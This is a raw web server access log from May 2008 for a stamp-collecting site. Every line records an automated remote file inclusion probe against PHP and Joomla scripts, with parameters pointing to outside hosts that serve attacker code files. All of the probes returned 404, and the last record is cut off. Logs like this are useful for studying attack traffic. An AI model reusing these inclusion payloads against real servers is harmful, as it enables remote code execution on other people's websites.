217.160.203.190 - - [25/May/2008:23:53:37 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.74.75 - - [25/May/2008:23:53:40 -0700] "GET /logs//errors.php?error=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.74.75 - - [25/May/2008:23:53:40 -0700] "GET //errors.php?error=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.72.189 - - [25/May/2008:23:57:37 -0700] "GET /components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
85.214.72.189 - - [25/May/2008:23:57:37 -0700] "GET /logs/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:57:50 -0700] "GET /logs/access_080407.log/convert/mvcw.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:57:50 -0700] "GET /convert/mvcw.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:57:50 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.38.4.3 - - [25/May/2008:23:58:42 -0700] "GET /logs/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
64.38.4.3 - - [25/May/2008:23:58:42 -0700] "GET /components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
67.19.51.194 - - [25/May/2008:23:59:52 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://202.143.148.58/media/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
204.253.132.40 - - [26/May/2008:00:02:41 -0700] "GET /logs//main.php?pagina=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
204.253.132.40 - - [26/May/2008:00:02:41 -0700] "GET //main.php?pagina=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.87.81.18 - - [26/May/2008:00:05:41 -0700] "GET /logs/access_080512.log//index.php?option=com_custompages&cpage=http://romania.aboutus.vg/images/id5.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
70.87.81.18 - - [26/May/2008:00:05:41 -0700] "GET //index.php?option=com_custompages&cpage=http://romania.aboutus.vg/images/id5.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
82.78.216.197 - - [26/May/2008:00:06:26 -0700] "GET /logs/access_080512.log//index.php?option=com_custompages&cpage=http://romania.aboutus.vg/images/id5.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
82.78.216.197 - - [26/May/2008:00:06:27 -0700] "GET //index.php?option=com_custompages&cpage=http://romania.aboutus.vg/images/id5.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
70.87.81.18 - - [26/May/2008:00:09:17 -0700] "GET //index.php?option=com_custompages&cpage=http://romania.aboutus.vg/images/id5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
62.75.184.73 - - [26/May/2008:00:09:38 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
62.75.184.73 - - [26/May/2008:00:09:39 -0700] "GET //ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
62.75.184.73 - - [26/May/2008:00:09:40 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
82.78.216.197 - - [26/May/2008:00:09:41 -0700] "GET //index.php?option=com_custompages&cpage=http://romania.aboutus.vg/images/id5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5